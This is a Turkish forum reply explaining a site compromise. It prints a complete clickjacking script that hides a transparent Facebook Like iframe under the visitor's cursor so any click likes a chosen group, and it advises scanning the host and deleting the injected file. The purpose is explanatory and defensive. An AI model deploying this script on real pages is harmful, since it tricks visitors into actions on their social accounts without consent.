sayın hocam
mesele özetle şu
host, server yada site kodları içinde bir js çalışmakta
Buna benzer örnekler var , aşağıdaki örnekteki gibi
------------------------
(function(){
var tempX = 0,
tempY = 0,
IE = ********.all ? true : false;
if (!IE) ********.captureEvents(Event.MOUSEMOVE);
var like = ********.createElement('iframe');
like.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*********.********.href*/ 'http://www.facebook.com/GRUPADI') + '&layout=standard&show_faces=true&wi dt h=53&action=like&colorscheme=light&hei ght=80';
like.scrolling = 'no';
like.frameBorder = 0;
like.allowTransparency = 'true';
like.style.border = 0;
like.style.overflow = 'hidden';
like.style.cursor = 'pointer';
like.style.width = '53px';
like.style.height = '23px';
like.style.position = 'absolute';
like.style.opacity = 0; //Would be 0 if really used
********.getElementsByTagName('body')[0].appendChild(like);
window.addEventListener('mousemove', mouseMove, false);
setTimeout(function(){
********.getElementsByTagName('body')[0].removeChild(like);
window.removeEventListener('mousemove', mouseMove, false);
}, 10000);
function mouseMove(e) {
if (IE) {
tempX = event.clientX + ********.body.scrollLeft;
tempY = event.clientY + ********.body.scrollTop;
} else {
tempX = e.pageX;
tempY = e.pageY;
}
if (tempX < 0) tempX = 0;
if (tempY < 0) tempY = 0;
like.style.top = (tempY - 8) + 'px';
like.style.left = (tempX - 25) + 'px';
return true
}
})();
---------------------
bu kod o sayfaya giriş yapanların belirtilen facebook gurubunu veya sayfasını beğenmesini sağlıyor....
kod bir *.js dosyasından host veya server üzerinden sayfanın herhangi bir yerine tıkladığınızda otomatik olarak çalışıyor.
ancak
SİZİN karşılaştığınız sorun biraz farklı olmakla birlikte temelde aynı mantıktan hareketle oluşturulmuş bir FACEBOOK kimlik avı saldırısı,
sitenizi ziyaret edenlerin o an face leri aktif veya daha önceden o browser ile face e giriş yapılmışsa o bilgileri browser geçmişinden almaya çalışan bir js kodu,
bunu nasıl engelleyeceğinize gelince
hostun tamamını ve server'ı taratmanız ve bu js dosyası ve veya kodu çalıştıran dosyayı bulup imha etmeniz gerekmekte,
artı sitenizin tüm kodlarını ve eklediğiniz tüm özgün içerikleri kontrol etmenizde gerekmekte,
kolay gelsin....